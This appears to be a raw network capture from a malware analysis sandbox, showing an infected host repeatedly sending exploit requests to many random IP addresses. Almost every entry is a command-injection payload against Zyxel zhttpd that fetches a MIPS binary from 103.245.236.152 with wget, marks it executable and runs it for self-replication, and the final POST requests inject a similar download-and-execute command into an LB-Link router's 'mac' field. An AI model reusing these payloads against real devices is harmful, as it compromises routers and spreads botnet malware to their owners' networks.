                                          Jan 14, 2024 15:46:31.335931063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8124192.168.2.234969484.61.207.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335942030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8125192.168.2.2350498172.179.80.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335958958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8126192.168.2.2360256110.160.252.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335997105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8127192.168.2.235167491.121.174.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336035967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8128192.168.2.2355778151.156.58.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336035967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8129192.168.2.2334186165.126.155.229443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336061954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8130192.168.2.2337300134.82.34.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336061954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8131192.168.2.2349550152.143.209.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336114883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8132192.168.2.2344130193.54.19.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336146116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8133192.168.2.235734066.74.56.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336175919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8134192.168.2.235297493.85.114.3443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336214066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8135192.168.2.2357650159.219.252.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336241007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8136192.168.2.2349372136.203.177.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336273909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8137192.168.2.233817417.122.146.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336288929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8138192.168.2.233982676.239.70.121443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336344957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8139192.168.2.2359804105.251.152.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336349010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8140192.168.2.234825244.207.237.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336385012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8141192.168.2.2358548125.204.117.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336395979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8142192.168.2.233320632.29.169.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336446047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8143192.168.2.2353588162.149.233.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336453915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8144192.168.2.23491025.217.46.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336502075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8145192.168.2.2358754219.43.53.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336518049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8146192.168.2.23518864.167.221.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336551905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8147192.168.2.235348640.241.129.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336595058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8148192.168.2.233494845.161.157.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336618900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8149192.168.2.2340326193.66.149.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336642981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8150192.168.2.2349582180.106.116.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336667061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8151192.168.2.234197419.11.253.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336688995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8152192.168.2.2337656198.234.249.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336709023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8153192.168.2.2360956111.30.247.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336740017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8154192.168.2.2354752152.72.37.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336775064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8155192.168.2.235173446.96.14.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336805105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8156192.168.2.235675476.195.145.226443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336812019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8157192.168.2.233505483.186.231.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336839914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8158192.168.2.235292812.213.65.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336898088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8159192.168.2.2335716160.84.170.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336908102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8160192.168.2.2348906208.157.196.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.336920977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8161192.168.2.2347112154.113.27.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.339941025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8162192.168.2.233838084.120.231.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.339962959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8163192.168.2.2346200220.86.255.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.339975119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8164192.168.2.234684473.167.141.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.340054035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8165192.168.2.2341230193.86.73.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.340070009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8166192.168.2.2360208116.235.44.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.340110064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8167192.168.2.2359828222.211.183.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.340140104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8168192.168.2.235388652.207.61.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.340159893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8169192.168.2.234130071.128.158.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.340188980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8170192.168.2.2358504113.221.169.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.340226889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8171192.168.2.2359002220.64.241.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.340250015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8172192.168.2.2350144203.208.109.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.340303898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8173192.168.2.2356798104.164.198.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.340327978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8174192.168.2.233593612.158.215.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.340352058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8175192.168.2.2360854145.236.176.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.340374947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8176192.168.2.2344888212.57.144.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.340413094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8177192.168.2.234177271.42.109.217443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.340428114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8178192.168.2.2360668206.86.204.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.340478897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8179192.168.2.2360702103.50.107.102443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.340517044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8180192.168.2.2359654140.238.82.217443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.340544939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8181192.168.2.23328109.238.82.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.340544939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8182192.168.2.2343206199.101.114.2248080
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.141864061 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                          Cookie: user=admin
                                          Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                          Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                          Jan 14, 2024 15:46:32.478806973 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                          Cookie: user=admin
